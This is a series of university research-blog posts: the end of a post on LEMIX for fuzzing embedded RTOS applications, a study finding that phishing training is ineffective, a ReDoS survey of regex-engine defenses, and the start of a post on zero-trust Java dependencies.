To address this, LEMIX introduces an automated process that selectively applies the application’s RTOS configurations to a POSIX-compatible RTOS (LPL). Only those settings that compile cleanly are retained, ensuring semantic fidelity.

Challenge 2: Retargeting To Different ISAs

Embedded applications often rely on non-standard C features and ISA-specific assembly (e.g., ARM), making them incompatible with compilers like Clang which enables more robust analysis on the generated LLVM IR. Simply switching to Clang and targeting x86 results in failures — so very many failures :-( — due to toolchain and architecture-specific dependencies.

LEMIX addresses this through an interactive refactoring process that transforms embedded code into Clang compatible form. We automate common refactorings using predefined templates and provide precise guidance for issues requiring developer input. This enables successful compilation to LLVM bitcode for further analysis. We tackle two aspects of this challenge:

Compiler Incompatibilities: Differences between GCC and Clang (e.g., type assumptions, unsupported features) are resolved via automated or guided refactoring.
Inline Assembly: Inline assembly is commented out, and affected variables are safely initialized. For complex cases, LEMIX identifies and flags issues with suggested fixes.

Challenge 3: Handling Peripheral Interactions

Embedded systems access peripherals mainly via Memory-Mapped I/O (MMIO) addresses, which represent physical hardware. Correctly distinguishing MMIO from regular memory is essential to avoid incorrect behavior.

LEMIX assumes malicious peripherals that can control all MMIO inputs. To handle this, reads from MMIO addresses are modeled as reads from standard input, while writes to device memory are ignored since the focus is on vulnerability detection.

Instead of relying on often incomplete SVD files, LEMIX automatically identifies MMIO ranges by analyzing constant hardcoded addresses used in load/store instructions. It groups related addresses by coalescing pages within ±2 KB of each detected range.
At runtime, compile-time instrumentation hooks all memory accesses. If a load targets an MMIO address, the hook returns input data; stores to MMIO addresses are ignored. This enables realistic peripheral interaction modeling without precise hardware details.
LEMIX handles interrupts as random peripheral inputs by identifying ISRs via RTOS-specific patterns (e.g., vector tables) while excluding assembly-only handlers. It creates a Dispatcher Task to invoke ISRs at arbitrary intervals and uses lightweight binary analysis and dynamic tracing to disable ISRs that cause false crashes due to unmet preconditions.

Implementation

The following figure shows how we combine these parts to realize the LEMIX prototype.

Evaluation & Results

Questions

We evaluate LEMIX by answering the following questions:

RQ1: How effective is our approach in converting embedded applications to LEMIX APPlications (LEAPPS) and how much manual effort is required?
RQ2: How effective is our peripheral identification analysis?
RQ3: What is the effectiveness of testing LEAPPs through different fuzzing approaches ie, whole-program and function-level fuzzing and how do they compare with existing state-of-the-art?

Dataset

Remember, LEMIX is targeting Type-2 embedded systems (i.e., those based on a real-time embedded operating system/RTOS). We selected 18 applications across four diverse RTOSes: FreeRTOS, Zephyr, Nuttx, and ThreadX. These included both large, actively maintained projects (e.g., PX4, Infinitime) and smaller peripheral-focused ones (e.g., Nrf_Pwm), to increase our confidence in the generalizability of our approach.

RQ1: Converting to Linux Applications

We evaluate LEMIX by measuring its success in converting 18 embedded applications to Linux executables and the manual effort required, with a conversion considered successful if the application compiles and runs without crashing. Manual effort falls into three categories:

Setup (source files and build steps)
Compiler fixes
Inline assembly handling, with time spent and source code changes tracked.

Conversions were performed by graduate students with moderate C/C++ skills and limited embedded experience, making our effort estimates conservative upper bounds. Compiler fixes required little effort (20–40 min) despite significant SLOC changes, none for NuttX apps and slightly more for larger FreeRTOS apps while inline assembly handling also took minimal time (20–30 min median), demonstrating the effectiveness of LEMIX’s automated transformations.

RQ2: Peripheral Handling

We identified that none of the discovered ranges conflicted with a ported application’s virtual memory, confirming accurate instrumentation. Over 50% of the identified MMIO ranges were missing in the SVD files, but manual inspection confirmed they correspond to valid peripheral addresses used in the code, highlighting gaps in SVD documentation rather than shortcomings of our approach.

This aspect of LEMIX involved detecting memory-mapped regions. These are nominally declared in SVD files. We found that LEMIX’s automatic analysis often disagreed with the SVD files (red bars) but that LEMIX’s analysis was typically correct. Automated tools can overcome poor documentation!

RQ3: Testing LeApps & Comparative Evaluation

We evaluate under three fuzzing modes:

M1: Whole-program fuzzing with MMIO instrumentation.
M2: M1 + weakened state-dependent conditions.
M3: Function-level fuzzing with M1+M2 optimizations.

We compare against two prior works, MultiFuzz (Mf) and Fuzzware (Fw).

Setup: For whole-program fuzzing, we modified AFL++ to meet our realtime fuzzing needs leveraging the persistent mode. For function-level fuzzing, ~100–150 risky functions per app (identified via pointer usage and manual checks) were fuzzed independently for ~5 min/function.

Results:

Coverage: LEAPPs reached >70% of reachable functions; M3 achieved ~10× higher coverage than whole-program fuzzing.
Bugs: Function-level fuzzing revealed 11 unique bugs missed by whole-program fuzzing. On average, LEMIX (M2/M3) detected 21 bugs, vs. Mf (1) and Fw (3).

Comparison: Mf generally outperformed Fw in coverage but was lower than LEMIX, except on apps (n1, z2) benefiting from nested interrupt support. LEMIX’s simpler model lacks nesting. Fw also produced false positives (e.g., z1 crashes). All baseline bugs were also detected by LEMIX using AFL++.

Using LEMIX to port applications to Linux and then employing an off-the-shelf fuzzer (AFL++), we found that (1) the M3 configuration of LEMIX produced substantially better line coverage; and (2) both M2 and M3 configurations substantially outperformed the state-of-art baselines.

Conclusion

We present LEMIX, a system for rehosting embedded applications as Linux binaries by addressing challenges in ISA retargeting, semantics preservation, and peripheral interaction handling. Evaluated across 18 applications spanning four RTOSes, LEMIX uncovered 21 previously unknown bugs, most of which have been confirmed and fixed by developers, achieving higher coverage and bug detection than prior work. While LEMIX relies on RTOS-specific LPLs (commonly available) and may miss ISRs that depend on global state or code with fixed memory layouts, future work will focus on improving automation, ISR coverage using techniques like AIM, and automatic refactoring of layout-specific code to further enhance coverage and platform support.

Acknowledgments

This research was supported by Rolls-Royce and the National Science Foundation (NSF) under Grant CNS-2340548.

Learn more

The full manuscript is here.
An artifact, including source code, is available here.

Phishing Training Still Isn’t Working, So Why Are We Still Paying for It?

James Davis — Thu, 19 Jun 2025 01:39:09 GMT

As anyone who works with me professionally knows, I’m an empiricist at heart. My pulse quickens at the prospect of designing experiments to test hypotheses — preferably meaningful ones whose results might have some effect on the world. I recently completed one such study with my student Drew Rozema, who moonlights as (1) a professor, and (2) a cybersecurity whiz. We recently completed a delicious study on phishing training, published at WWW’26 (paper link), that we wanted to share with you. This post is brought to you by Drew with minor editing by myself. All right, Drew, take it away!

The question

At least in the USA, anyone who spends any time with an email address associated with a major institution likely receives some phishing emails every day or two. We all roll our eyes and “Report Junk”, and wonder how anyone can fall for such things. But phishing is a major criminal enterprise, with most big attacks begun or facilitated via phishing. To combat phishing, we’ve also all participated in mandatory phishing training. After spending years in cybersecurity education, I’ve seen the same claims about phishing awareness training repeated like gospel: “Users are the Human Firewall,” “Training reduces risk,” “Engaged employees are your first line of defense,” “Interactive learning drives change” … but are these claims true?

(Prof. Davis says: Given how I complete these trainings myself, it’s hard to believe they do any good. Sometimes I turn on the video, move it to the backup monitor, let it rip, and ask ChatGPT to finish the quiz for me. I’ve got other things to do. But of course I would never do this for An Important Training, so if you’re curious about yours then I definitely did it properly.)

The study design

We conducted a large-scale study (N = 12,511) of phishing effectiveness at a US-based financial technology (“fintech”) firm. Our two-factor design compared the effect of treatments (lecture-based, interactive, and control groups) on subjects’ susceptibility to phishing lures of varying complexity (using the NIST Phish Scale). After training, we performed controlled phishing simulations over a several month period.

Our method and results.

We used the resulting data to test four hypotheses:

Summary of study hypotheses, their theoretical grounding, and relation to prior work. The hypotheses address the effects of phishing email difficulty, training, and training modality on detection and reporting behaviors.

What We Found: Training vs. Phish Difficulty

The results? Training didn’t matter.

Summary of training effectiveness results. Average rates show that trained groups performed similarly to control group, with modest differences across conditions.

To summarize:

Employees who received no training were about as likely to click or report phishing emails as those who completed vendor-provided modules.
The difficulty of the phishing email — as defined by the NIST Phish Scale — was the only meaningful predictor of success or failure. “Easy” phish had a 7% click rate. “Hard” ones jumped to 15%.
Neither lecture-based training nor interactive quizzes produced statistically significant improvements in detection or reporting.
Effect sizes for training were below 0.01 — too small to justify the enormous cost and compliance burden.

Discussion

A grain of salt: Proxy vs. Precise measures

Our study used click-through rates as the primary measure of a user’s phishing susceptibility. This is a proxy of the actual measure of interest: the extent to which victims disclose sensitive information as a result of the phishing campaign. An ideal experiment would show whether phishing training reduces disclosure rates.

It is conceivable that the actual world looks like this: “About 10% of the time, people will click on phishing attempts. But with training, after clicking they are more likely to be suspicious and less likely to disclose data”. If this is the case, our results would be showing only the first part of the real world, and missing the crucial second part.
Do I think this is the actual result of training? Personally I doubt it — I think the lion’s share of defense is to keep the humans from clicking in the first place, which is why I’ve interpreted the results the way I did. I also note that the first step in any phishing attack is to get you to click. After that, the realism of the destination site becomes the major influence on subsequent behavior. If an employee chooses to click on a link that says it is to the Dropbox/Google/Salesforce/etc. login, it’s not difficult for an attacker to mock up a fake website nearly indistinguishable from the original.

I suggest that if training has no effect on click-through rates, then (1) training should be much more focused on vetting site trustworthiness, and (2) companies might want to deploy more sophisticated guards on employees’ behaviors when they interact with untrusted websites. The idea of browser plug-ins that detect when sensitive information is being sent to an untrusted destination has been around for a long time (and is available through some endpoint detection and response tools), and maybe the time has come for a widespread embrace of this technology. This brings me to my next points:

Note: G. Malewicz reminded us of the perils of overemphasizing proxies vs. precise measures of the variable of interest. I am grateful for his attention.

Echoing prior work

This reinforces a now-familiar refrain: people don’t need more training — they need better shields.

Multiple studies across different sectors have reached similar conclusions. Our findings align with growing evidence questioning training effectiveness. Ho et al.’s study (2025) found similar results — training had minimal impact on phishing susceptibility. Likewise, Jampen et al.’s 2020 meta-analysis concluded that while some short-term improvements are possible, the evidence for lasting behavioral change remains weak. While our results echo those of prior work, our work is distinctive for its large scale, its controlled setting, and its evaluation of several hypotheses.

Summary of prior experiments on phishing and training interventions. Studies are organized by research context (lab vs. real-world). Context: “Lab” denotes research simulations, where subjects are not in their work roles. “Real-world” denotes studies where participants were employees acting in their job capacity. Complexity measure: whether the study controlled for the difficulty of the phishing tasks. ✓ indicates the use of an open control such as the NIST Phish Scale, and ✘ indicates no control. Hypotheses: how these works informed the hypotheses in our study.

The Regulatory Elephant in the Room

Despite the mounting evidence, training remains mandated by HIPAA, PCI DSS, ISO 27001, and others. This creates a compliance paradox: organizations continue to invest heavily in programs that demonstrably don’t move the needle.

While regulators may have good intentions, it’s time to ask hard questions:

Should we redefine compliance to prioritize effectiveness over box-checking?
Can we incentivize measurable outcomes rather than relying on outdated training requirements?

When Training Hurts More Than Helps

One of the more unsettling findings in our work and the broader phishing literature: training might actually increase risk in some cases. We saw higher click rates on “easy” phishing emails from trained users, suggesting that training may:

Shift attention toward more sophisticated cues
Desensitize users to “obvious” threats
Create a false sense of confidence

This phenomenon has been observed elsewhere. Caputo et al.’s 2014 study tested embedded training delivered immediately after users clicked phishing links. Despite receiving contextual education about the specific phishing indicators they missed, participants were not significantly less likely to click in subsequent trials — even with just-in-time training at the moment of peak learning opportunity.

In short: some users overfit to training examples and miss the forest for the trees, while others simply don’t benefit from training regardless of timing or context.

A Word About the Coming Storm: LLMs and AI

What happens when phishing emails are no longer riddled with typos and poor grammar? What happens when attackers can:

Clone organizational voices,
Autogenerate context-rich lures,
And tailor attacks to personal social graphs — at scale?

This is not speculation — it’s happening now. Tools like ChatGPT, WormGPT, and open-source LLMs are already being weaponized.

Training won’t stop that. Instead, we should be investing in:

Cryptographic sender verification: Deploying SPF, DKIM, and DMARC ensures emails are authenticated at the domain level before reaching inboxes. SPF verifies authorized IPs, DKIM uses cryptographic signatures to confirm message integrity, and DMARC ties SPF/DKIM together — allowing domain owners to specify handling of failed authentication while generating feedback reports. Together, these protocols create a powerful defense against spoofing and phishing .
Secure PROCESSES for critical functions: High-risk actions — such as approving invoices, changing passwords, or resetting accounts — shouldn’t rely on a single email click. Instead, implement workflows with out-of-band confirmations (e.g. SMS or voice), multi-person approvals, and temporary tokens tied to user/device-specific factors. Embedding such verification steps dramatically reduces the risk of phishing-based breaches.
Passwordless authentication: Eliminating passwords removes credentials that are often targeted by phishing. Modern solutions leverage FIDO2/WebAuthn, enabling authentication via hardware tokens or platform-based biometric systems. The private keys stay on the user’s device, preventing attackers from capturing shared secrets — making these methods inherently phishing-resistant. Major standards bodies and platforms (FIDO Alliance, W3C, Microsoft, etc.) recommend and support this approach.
Zero‑trust network designs: With zero‑trust, no device or user — inside or outside the perimeter — is automatically trusted. Every access request is re‑authenticated, authorized based on least-privilege principles, and continuously validated. This limits the impact of stolen credentials or successful phishing clicks, preventing lateral movement within the network.
User behavior anomaly detection: Automated monitoring solutions — such as Network Access Control (NAC), User and Entity Behavior Analytics (UEBA), and AI‑driven systems — track deviations from established user patterns. Sudden spikes in file access, off-hours logins, or anomalous data transfers trigger alerts or automatic contingencies. These tools detect suspicious activity even if a user unknowingly engages with phishing content.

From Punishment to Pragmatism

One troubling trend in many organizations is the use of punitive responses to failed phishing simulations — mandatory punitive training, disciplinary actions, even public shaming. Our findings suggest this is not only unfair but counterproductive.

Users aren’t the weak link; they’re the last line of defense in a chain that should have blocked the phish long before it reached their inbox. Blaming them for failures in that system does nothing to strengthen it.

Where Do We Go From Here?

Let’s be clear: this study doesn’t mean we should abandon training entirely. But it does mean we should:

Reframe awareness efforts as culture-building, not threat mitigation.
Use the NIST Phish Scale to design better benchmarking for simulated campaigns.
Focus compliance reporting on technical controls and layered defense rather than superficial training metrics.
Reserve training for high-risk roles or post-incident remediation — not blanket deployment.

It’s time we stop asking “How do we make humans better at catching phish?” and start asking: “Why are we still relying on them to do so much catching in the first place?”

Thanks, Drew, for this great writeup. If you’d like to read the full piece, it’s available here and will appear at The Web Conference in 2026 (WWW’26).

SoK: A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS)

James Davis — Tue, 03 Jun 2025 19:49:08 GMT

This blog post summarizes our recent work, “SoK: A Literature and Engineering Review of Regular Expression Denial of Service (ReDoS),” which appeared at the ACM ASIA Conference on Computer and Communications Security 2025 (ACM ASIACCS’25). This work was done in collaboration with Cris Staicu and his student Masud Bhuiyan at Germany’s CISPA Helmholtz Center for Information Security. This post was written by the co-lead author, my student Berk Çakar. You can find the preprint of the full paper here.

Background: Regexes and ReDoS

Regular expressions are everywhere. They are used for input validation, search, parsing, and nearly every software system processes text. But what if a seemingly harmless regex in your codebase, or even one hidden away in an imported library, could be exploited by an attacker to bring your whole system down?

This threat is known as Regular Expression Denial of Service (ReDoS), and dignified by MITRE in 2021 as CWE-1333 [1]. High-profile services have experienced outages due to CWE-1333: In 2016, Stack Overflow went dark for 34 minutes because of one regex [2]. The same issue happened to Cloudflare in 2019 for 27 minutes [3]. For JavaScript applications, some authors have found that ReDoS is the fourth most commonly reported server-side vulnerability [4].

The following figure from our paper shows the frequency of ReDoS CVEs by programming language package ecosystem (e.g. NPM/JS, PyPI/Python, etc.), with the OWASP Top-10 for comparison. ReDoS CVEs represent ~1% of CVEs on average across the ecosystems.

Distribution of OWASP Top-10 and ReDoS CVEs per software package ecosystem, showing average prevalence per category. Data cover 2014–2023.

A Quick Regex Refresher: Why Can Regex Matching Become Tricky?

Simply put, regexes define textual patterns. The original “Kleene’s regexes” (K-regexes) had the basic building blocks of matching a sequence of characters (/foo/), matching a choice of two sequences (OR, /foo|bar/), and matching a repeated sequence (/foo*/). These can be processed very efficiently, with an optimal linear-time algorithm ( the processing time grows proportionally to the length of the text you are checking).

But over time, regexes got empowered, with “Extended regexes” (E-regexes) adding complex features like backreferences (“match a previously-seen sequence”, /foo(bar)\1/) and lookarounds (check what’s before/after without consuming it, /(?<=foo)bar/ to match “bar” only if it is preceded by “foo” ). These add expressive power but can complicate matching done under the hood. You might ask, why would anyone need such features? The answer is that regexes are a common element of a search API, and sometimes people want to search for surprisingly complex things. You put the two together, and regexes have gotten saddled with loads of features over the years.

What Is ReDoS?

Now, speaking of the “under the hood”, a system component called a regex engine is used to process regexes. Regex engines typically implement one of two main approaches:

Thompson’s algorithm-based engines [5]: These strictly stick to formal automata theory and are fast with guaranteed linear-time performance. The trade-off is that they have limited support for complex E-regex features. RE2 and the Rust engine are notable examples.
Spencer’s algorithm-based engines [6]: These use a technique called “backtracking”. Imagine the engine trying one path to match; if it fails, it “backtracks” to try another. At various points in time, Python, C# (.NET), JavaScript (V8), and Ruby have all used this algorithm.

It is this second kind of engine that concerns us. The backtracking technique is really flexible. That makes backtracking a great way to implement the E-regex features. It also raises a problem: that flexibility reduces the optimization potential, resulting in worse-than-linear match times on certain regexes and certain inputs.

CWE-1333 (whether triggered by an attacker or inadvertently, as in the case of Stack Overflow and Cloudflare) happens when a particular kind of input string reaches a vulnerable regex in the system and triggers “catastrophic backtracking” on the regex engine. In this scenario the cost is asymmetric: the problematic input is small, but the server may still spend massive amounts of CPU time trying to match the regex, effectively denying service to legitimate users. That imbalance between the small cost for the attacker and the high cost for the server makes ReDoS an asymmetric threat [7].

For a ReDoS attack to work, three key ingredients are usually needed [8]:

A Backtracking Regex Engine: The system uses an engine that can suffer from catastrophic backtracking.
A Vulnerable (Super-Linear) Regex: The application uses a regex pattern that is “problematically ambiguous” and can lead to super-linear (as discussed above) matching time.
Attacker-Controlled Input: The attacker needs a way to craft and send the malicious string so it reaches and gets processed by that vulnerable regex.

For more on ReDoS, I recommend checking out this blog post from my lab.

Why We Wrote This Paper

The knowledge gap

Although the academic literature has many research papers about ReDoS written over the years, nobody has asked: What do we know about ReDoS, and what exactly matters to software practitioners? We aimed to document what is known about ReDoS, the gaps, and where we should go next.

The personal side

This project was supervised by James C. Davis and Cris Staicu. Davis and Staicu led two of the major works on ReDoS in practice — Davis’s FSE’18 paper on “The Impact of ReDoS in Practice” and Staicu’s USENIX’18 paper on “Freezing the Web”. We ourselves built on prior work providing measurement tools, and since then we’ve seen dozens of follow-up works at top computing research venues. We’ve chatted at conferences about the state of the field, and finally decided we should write a review paper.

Method and Results

We proceeded down two prongs of research.

First, we went over the existing academic research (i.e., the literature review part of the title), examining dozens of papers on how ReDoS is detected, prevented, and mitigated.
Second, we conducted an engineering review. We surveyed the latest regex engines in popular programming languages to see if and how ReDoS defenses have been implemented and how effective they are in practice. This is the part we think software engineers and developers would find especially interesting.

What Do We Know About ReDoS? (The Literature Review)

In our paper, we systematically reviewed 35 academic papers focusing on ReDoS. The next figure shows the categories we identified.

Systematization of ReDoS research papers categorized into detection, prevention, mitigation, and related studies, with subcategories and key references. For reference numbers, see the paper bibliography.

Here is a brief overview of each category:

Spotting ReDoS (Detection): How do we find these vulnerable regexes? Some authors use heuristics, others use formal automata. Others use dynamic detectors (e.g., fuzzing with runtime instrumentation) and ML models.
Stopping ReDoS Before It Happens (Prevention): Can we design things to be ReDoS-proof? Some authors have pursued better regex matching algorithms or optimizations such as memoization to avoid catastrophic backtracking. Others have developed tools to automatically rewrite vulnerable regexes into safer, equivalent ones.
Shielding Against ReDoS (Mitigation): What if an attack gets through? Some authors focus on anomaly detection, using ML or other techniques to spot when a regex is taking suspiciously long and then taking action. Others devise caps on how long regexes should be permitted to run, or how many backtracking steps can be taken.

During our review, we noticed that the academic community makes strong assumptions about ReDoS and attacker capabilities (e.g., assuming that attackers can send arbitrarily long inputs or always reach the vulnerable part of a regex), which may not always hold in practice due to common server-side protections like input validation & length limits, rate limiting, and application firewalls. We also found that definitions of what counts as a “ReDoS vulnerability” vary widely. Some studies consider a one-second slowdown significant, while others require much longer. These inconsistencies make it difficult to assess the actual risk in practice.

What Are We Doing Against ReDoS? (The Engineering Review)

It is great that researchers are working on ReDoS, but have their ideas made it into the regex engines developers use? We reviewed the regex engines used in nine popular programming languages: JavaScript, Ruby, C#, Java, PHP, Perl, Python, Rust, and Go. We found that some language runtimes modernized their regex engines in recent years to address ReDoS concerns, some utilized Thompson-style engines from the start to not give a chance for ReDoS, and some still use unoptimized Spencer-style engines that are vulnerable to ReDoS. The table below summarizes the current state of ReDoS defenses in these languages; a detailed description follows.

Summary of ReDoS defenses in the implementations of major programming languages.

JavaScript (Node.js — V8): Introduced an opt-in Thompson-style non-backtracking engine in 2021 for regexes that do not use E-regex features [9]. For those that do, the old Spencer-style backtracking engine is the only option. The change shipped in V8 v8.8, and Node.js adopted it as an experimental feature since v16.0.0. Engineering effort to implement this change was about 1558 lines of code (LOC), which is 10.6% of the original regex engine codebase.
Ruby (MRI/CRuby): Adopted Davis et al.’s [6] memoization scheme for its Spencer-style backtracking engine for a defense that is on by default, and offers an optional timeout mechanism for E-regexes that can’t be memoized. Both features are available since Ruby 3.2 (2022) [10,11]. In total, both defenses took 1100 LOC to implement, corresponding to 4.7% of the original regex engine codebase.
C# (.NET): Added an optional non-backtracking engine based on Brzozowski derivatives [12,13] in .NET 7 (2022) [14] and also had an optional timeout feature since .NET 4.5 (2012) [15]. However, the non-backtracking engine does not support many E-regex features similar to Thompson-style engines. The new non-backtracking engine is implemented in 5417 LOC, which is 34.7% of the original regex engine codebase.
Java (OpenJDK): Introduced some bounded caching mechanisms to its Spencer-style backtracking engine, which can help in certain ReDoS scenarios. This ReDoS defense has been available and enabled by default since Java 9 (2016). 1712 LOC were added to the original regex engine codebase (35.5% expansion) to implement this change.
Rust and Go: These languages were designed with ReDoS safety in mind from the beginning, using Thompson-style engines that guarantee linear time matching. As a consequence, they do not support most of the E-regex features.
PHP (Zend Engine), Perl (perl5), and Python (CPython): PHP, Perl, and Python also use Spencer-style backtracking regex engines and are likely vulnerable to ReDoS attacks. PHP [16] and Perl utilize [17] “counter-based caps” (i.e., limits on the number of backtracking steps) for more than 20 years to prevent catastrophic backtracking as an alternative to C# and Ruby’s “time-based caps” (i.e., timeouts).

Lastly, Python has neither built-in engine optimizations against ReDoS vulnerabilities nor a native timeout-like mechanism for regex evaluations.

Now, it is great that engines are being updated, but how much safer are we? Or, reversely, how much more vulnerable are we if we use an engine that does not have ReDoS defenses?

To figure this out, we designed an experiment. We grabbed a set of ~500K regexes collected from open-source software [18]. Using vuln-regex-detector, we identified regexes that were predicted to have exponential or polynomial worst-case behavior. For these candidates, we generated input strings designed to trigger ReDoS.

Then, we ran these regex-input pairs on two versions of the reviewed regex engines: an older version (before any major ReDoS fixes) and the latest version (with any new defenses turned on, even if they were not default). We timed how long the matches took and categorized them:

Exponential: The worst-case scenario. The processing time exceeds five seconds with 500 or more pumps of an attack string.
High-Polynomial: Huge improvement but still pretty bad. The processing time exceeds five seconds with 500 or more pumps of an attack string.
Low-Polynomial: Getting better… The processing time exceeds 0.5 seconds on an attack string but does not meet the exponential or high-polynomial criteria.
Linear: Nice and speedy. The regex match never times out on the attack string.

OK, how did it go?

Performance of regex matching in old vs. latest engines.

The figure shows a substantial decrease in super-linear behavior in the engines that had implemented ReDoS defenses. Notably, exponential behavior is resolved in C# and JavaScript but persists in Ruby and Java, while polynomial behavior continues to manifest in JavaScript and Java. Therefore, the answer is yes! The defenses appear to be effectively working in addressing the common causes of super-linear behavior.

What Does All Mean?

Our work is not only an academic exercise but also a call to action for developers and software engineers, and for researchers. Here are some key takeaways:

ReDoS is Contextual: A regex that is dangerous in one deployment can be harmless in another because engine versions, thread models, and resource limits differ. For example, a super-linear regex might be more serious in a single-threaded web application architecture like Node.js.
Question the Threat Model: Much prior work assumes the adversary can send huge payloads or hit any input point without throttling. Production systems often enforce size caps, rate limits, or WAF filters. Before triaging a “vulnerable” regex, ask whether an external user can realistically reach it with a suitably long string.
Expect Developer Pushback: Engineers sometimes label ReDoS reports as noise because few real outages have been traced to deliberate attacks, and some CVEs have been disputed. When filing bugs or reviewing reports, accompany them with a reproducible proof-of-concept under realistic circumstances; otherwise, the issue may be dismissed.
Know Your Regex Engine: Understand the default behavior of the regex engine in your programming language and whether it offers safer modes or ReDoS-specific defenses. Are they on by default? Which regex APIs do you need to use to get the safest behavior? If you are using a Spencer-style regex engine, be more cautious.
Look Beyond Regexes: Some parts of your program take longer than others to execute. If an attacker can repeatedly reach these slow spots, the service can stall, much like in a ReDoS attack. While most denial-of-service cases still rely on big traffic spikes, attackers may switch to these “complexity” tricks. Regular profiling, removing needless loops, and adding timeouts on heavy work can save CPU cycles and leave attackers with less to exploit.

Final Thoughts

Our exploration of ReDoS research and regex engine defenses shows a promising trend: awareness is growing, and solutions are emerging.

In fact, we think this is a clear success stories for software engineering and cybersecurity research: researchers identified the problem, analyzed its causes, proposed solutions, and, in many cases, helped shape practical defenses now used in production systems.

However, the ReDoS threat still continues. By understanding the nuances of ReDoS, knowing your tools, and thinking critically about exploitability, you can help taking ReDoS under control.

We hope our work provides a valuable map for researchers studying ReDoS as well as for software engineers on the front lines using regexes in their applications.

We thank the US National Science Foundation (NSF) for supporting this work through NSF-SaTC-2135156.

References

[1] CWE-1333: Inefficient Regular Expression Complexity. https://cwe.mitre.org/data/definitions/1333.html.

[2] Stack Exchange Network Status. 2016. Outage Postmortem — July 20, 2016. https://stackstatus.tumblr.com/post/147710624694/outage-postmortem-july-20–2016

[3] John Graham-Cumming. 2019. Details of the Cloudflare outage on July 2, 2019. https://blog.cloudflare.com/details-of-the-cloudflare-outage-on-july-2-2019

[4] Masudul Hasan Masud Bhuiyan, Adithya Srinivas Parthasarathy, Nikos Vasilakis, Michael Pradel, and Cristian-Alexandru Staicu. 2023. SecBench.js: An Executable Security Benchmark Suite for Server-Side JavaScript. In Proceedings of the 45th International Conference on Software Engineering (Melbourne, Victoria, Australia) (ICSE ’23). IEEE Press, 1059–1070. doi:10.1109/ICSE48619.2023.00096

[5] Ken Thompson. 1968. Programming Techniques: Regular expression search algorithm. Commun. ACM 11, 6 (June 1968), 419–422. doi:10.1145/363347.363387

[6] Henry Spencer. 1994. A Regular-Expression Matcher. In Software Solutions in C. Academic Press Professional, Inc., USA, 35–71

[7] Georgios Mantas, Natalia Stakhanova, Hugo Gonzalez, Hossein Hadian Jazi, and Ali A. Ghorbani. 2015. Application-layer denial of service attacks: taxonomy and survey. International Journal of Information and Computer Security 7, 2/3/4 (Nov. 2015), 216–239. doi:10.1504/IJICS.2015.073028

[8] James C. Davis, Francisco Servant, and Dongyoon Lee. 2021. Using Selective Memoization to Defeat Regular Expression Denial of Service (ReDoS). In 2021 IEEE Symposium on Security and Privacy (SP). IEEE, 1–17. doi:10.1109/SP40001.2021.00032

[9] Martin Bidlingmaier. 2021. An Additional Non-Backtracking RegExp Engine. https://v8.dev/blog/non-backtracking-regexp

[10] Yui Naruse. 2022. Ruby 3.2.0 Released. https://www.ruby-lang.org/en/news/2022/12/25/ruby-3-2-0-released/.

[11] Victor Shepelev. 2023. Ruby 3.2 Changes. https://rubyreferences.github.io/rubychanges/3.2.html#regexp-redos-vulnerability-prevention.

[12] Dan Moseley, Mario Nishio, Jose Perez Rodriguez, Olli Saarikivi, Stephen Toub, Margus Veanes, Tiki Wan, and Eric Xu. 2023. Derivative Based Nonbacktracking Real-World Regex Matching with Backtracking Semantics. Proc. ACM Program. Lang. 7, PLDI, Article 148 (June 2023), 24 pages. doi:10.1145/3591262

[13] Olli Saarikivi, Margus Veanes, Tiki Wan, and Eric Xu. 2019. Symbolic Regex Matcher. In Tools and Algorithms for the Construction and Analysis of Systems, Tomás Vojnar and Lijun Zhang (Eds.). Springer International Publishing, Cham, 372–378. doi:10.1007/978–3–030–17462–0_24

[14] Stephen Toub. 2022. Regular Expression Improvements in .NET 7. http://devblogs.microsoft.com/dotnet/regular-expression-improvements-in-dotnet-7.

[15] NET Contributors. 2023. What’s New in NET Framework. https://learn.microsoft.com/en-us/dotnet/framework/whats-new/#whats-new-in-net-framework-45.

[16] PHP Documentation Group. 2024. PHP: Runtime Configuration Manual. https://www.php.net/manual/en/pcre.configuration.php.

[17] Joerg Ludwig. 2009. Complex regular subexpression recursion limit. https://www.perlmonks.org/?node_id=810857.

[18] James C. Davis, Louis G. Michael IV, Christy A. Coghlan, Francisco Servant, and Dongyoon Lee. 2019. Why aren’t regular expressions a lingua franca? an empirical study on the re-use and portability of regular expressions. In Proceedings of the 2019 27th ACM Joint Meeting on European Software Engineering Conference and Symposium on the Foundations of Software Engineering (Tallinn, Estonia) (ESEC/FSE 2019). Association for Computing Machinery, New York, NY, USA, 443–454. doi:10.1145/3338906.3338909

Mitigating Software Supply Chain Vulnerabilities with Zero-Trust Dependencies

James Davis — Wed, 07 May 2025 15:45:14 GMT

This is a brief for the research paper “ZTDJava: Mitigating Software Supply Chain Vulnerabilities with Zero-Trust Dependencies”, published at the IEEE/ACM 2025 conference on Software Engineering (ICSE). This work was led by Paschal Amusuo, one of my research assistants. The full paper is available here (open-access preprint here). Paschal wrote this brief, which I have lightly edited. This paper is part of my lab’s body of work on the software supply chain — I put some links at the bottom if you want to read more.

Summary

This paper introduces Zero-Trust Dependencies (ZTD), a novel concept where dependencies in an application are untrusted, and require explicit policy authorization to access system resources. ZTD is distinguished from prior sandboxing work by its support for dependency management and its data-driven simple policies. We measure its feasibility, provide a system design and a prototype to enable adoption, and evaluate its effectiveness and cost in preventing software supply chain vulnerabilities.

Background

The Log4J Incident Taught Us Not To Trust Our Dependencies

Remember the Log4J vulnerability of 2021? A vulnerability in a simple logging library caused a global crisis. Attackers could exploit the vulnerability and execute malicious code within your application.

But first, what happened then? The Log4J library had a feature, Java Naming and Directory Interface (JNDI), that allowed it to find and fetch data from external servers using just a naming identifier [1]. If the fetched data is a serialized Java object, arbitrary code execution can occur when the object is deserialized. Hence, Ii an attacker could control what Log4J logged (e.g. if an application uses Log4J to log fields from user forms or HTTP headers), the attacker could direct Log4J to fetch and execute malicious code on the server the application runs on.

In the wake of this incident, organizations were forced to scramble for fixes, work nights and weekends or even shut down their applications to prevent being exploited, until the vulnerability was patched. Online sources even estimate that the average cost of the Log4J incident response was over $90,000 [2].

This incident highlighted a critical flaw in how we think about dependencies. Essentially, the question arose: Can we truly trust every library we use? The answer, unfortunately, turned out to be no.

Understanding the Software Supply Chain Risk

Modern software development relies heavily on third-party libraries, our “dependencies.” The use of dependencies make software development faster and easier, but they also introduce risk. We often treat them as black boxes, using their functionality but rarely understanding their internal workings or monitoring how they change over time. These dependencies are a part of our software supply chain, and any vulnerability within any dependency can become a vulnerability in our entire application if user-controlled input from the application reaches the vulnerable code.

